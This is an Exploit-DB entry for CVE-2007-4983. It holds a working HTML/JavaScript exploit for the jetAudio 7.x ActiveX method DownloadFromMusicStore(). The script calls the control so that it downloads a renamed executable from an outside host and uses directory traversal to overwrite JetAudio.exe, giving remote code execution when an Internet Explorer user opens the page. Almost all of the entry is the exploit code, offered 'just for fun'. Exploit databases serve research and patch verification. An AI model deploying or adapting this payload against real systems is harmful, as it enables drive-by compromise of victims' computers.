jetAudio 7.x - ActiveX 'DownloadFromMusicStore()' Code Execution

EDB-ID:

4427

CVE:

2007-4983

EDB Verified:

Author:

h07

Type:

remote

Exploit: /

Platform:

Windows

Date:

2007-09-19

Vulnerable App:

<HTML>
<!--
jetAudio 7.x ActiveX DownloadFromMusicStore() 0day Remote Code Execution Exploit
Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
Tested on:..
- jetAudio 7.0.3 Basic
- Microsoft Internet Explorer 6
Just for fun  ;) 
-->

<object id="obj" classid="clsid:8D1636FD-CA49-4B4E-90E4-0A20E03A15E8"></object>

<script>
var target = "DownloadFromMusicStore";
//>rename evil.exe evil.mp3
var url = "http://192.168.0.1/evil.mp3";
var dst = "..\\..\\..\\..\\..\\..\\..\\..\\Program Files\\JetAudio\\JetAudio.exe";
var title = "0day";
var artist = "h07";
var album = "for fun";
var genere = "exploit";
var size = 256;
var param1 = 0;
var param2 = 0;
obj[target](url, dst, title, artist, album, genere, size, param1, param2);
</script>
</HTML>

# milw0rm.com [2007-09-19]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services